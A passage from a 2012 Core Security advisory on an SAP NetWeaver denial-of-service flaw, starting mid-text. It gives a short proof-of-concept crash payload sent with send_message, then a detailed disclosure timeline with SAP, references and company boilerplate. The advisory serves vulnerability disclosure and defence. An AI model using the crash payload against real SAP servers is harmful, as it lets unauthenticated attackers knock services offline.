vulnerability could allow a remote unauthenticated attacker to conduct a
denial of service attack.
/-----
crash = "\x10\x0f\x01\x00\x11" + "A"*17
send_message(connection, crash)
-----/
9. *Report Timeline*
. 2012-01-24:
Core Security Technologies notifies the SAP team of the vulnerability,
setting the estimated publication date of the advisory for February
21st, 2012. 2012-01-24:
Core sends an advisory draft with technical details. 2012-01-24:
The SAP team confirms the reception of the issue and asks to use the
security ID 582820-2012 for further communication. SAP also notifies its
terms and conditions [3], and asks for Core to commit to that guideline. 2012-02-01:
The Core Advisories Team communicates that it has its own guidelines for
the advisories publication process, which may conflict with SAP's
guidelines. In particular, Core does not guarantee that the publication
of the advisory will be postponed until a fix or patch is made available
by SAP. If information about this vulnerability is partially or
completely leaked by a third party, the advisory would be released
immediately as forced release. Despite this, the Core team commits to
comply with SAP's guidelines as much as possible. 2012-02-21:
First release date missed. 2012-02-22:
Core asks for the status of the fix and notifies that the release date
was missed. 2012-02-23:
SAP notifies that, because the development team has to downport the
solutions for a huge bunch of software releases, the earliest release
date for the patches would be May 8th 2012. 2012-02-23:
Core re-schedules the advisory publication to May 8th. 2012-04-16:
Core asks if the patching process is still on track to release patches
on May 8th and requests a status of the fix. 2012-04-16:
Vendor notifies that the release date is still planned for May 8th, but
due to quality control processes this date cannot be guaranteed. 2012-05-04:
Core notifies that everything is ready for publication and requests the
vendor to confirm the release date and the list of affected platforms
(no reply received). 2012-05-07:
Core asks again for the status of the fix. 2012-05-08:
SAP notifies that they have released the security note 1687910 [4] on
May Patch Day 2012 and asks to include that information in [Sec. 6]. SAP
also requests Core to remove all the technical information researched by
Martin Gallo in [Sec. 8]. 2012-05-08:
Core replies that the reporting of vulnerabilities is aimed at helping
vulnerable users to understand and address the issues; the advisory will
thus be released with the technical information. 2012-05-08:
Advisory CORE-2012-0123 published.
10. *References*
[1] http://www.sap.com/platform/netweaver/index.epx
[2]
http://help.sap.com/saphelp_nw70ehp2/helpdata/en/47/cc212b3fa5296fe10000000a42189b/frameset.htm
[3] SAP's legal information, terms and conditions
http://www.sdn.sap.com/irj/sdn/security?rid=/webcontent/uuid/c05604f6-4eb3-2d10-eea7-ceb666083a6a#section46.
[4] SAP security note 1687910
https://service.sap.com/sap/support/notes/1687910.
11. *About CoreLabs*
CoreLabs, the research center of Core Security Technologies, is charged
with anticipating the future needs and requirements for information
security technologies. We conduct our research in several important
areas of computer security including system vulnerabilities, cyber
attack planning and simulation, source code auditing, and cryptography.
Our results include problem formalization, identification of
vulnerabilities, novel solutions and prototypes for new technologies.
CoreLabs regularly publishes security advisories, technical papers,
project information and shared software tools for public use at:
http://corelabs.coresecurity.com.
12. *About Core Security Technologies*
Core Security Technologies enables organizations to get ahead of threats
with security test and measurement solutions that continuously identify
and demonstrate real-world exposures to their most critical assets. Our
customers can gain real visibility into their security standing, real
validation of their security controls, and real metrics to more
effectively secure their organizations.
Core Security's software solutions build on over a decade of trusted
research and leading-edge threat expertise from the company's Security
Consulting Services, CoreLabs and Engineering groups. Core Security
Technologies can be reached at +1 (617) 399-6980 or on the Web at:
http://www.coresecurity.com.
13. *Disclaimer*
The contents of this advisory are copyright (c) 2012 Core Security
Technologies and (c) 2012 CoreLabs, and are licensed under a Creative
Commons Attribution Non-Commercial Share-Alike 3.0 (United States)
License: http://creativecommons.org/licenses/by-nc-sa/3.0/us/
14. *PGP/GPG Keys*
This advisory has been signed with the GPG key of Core Security
Technologies advisories team, which is available for download at
http://www.coresecurity.com/files/attachments/core_security_advisories.asc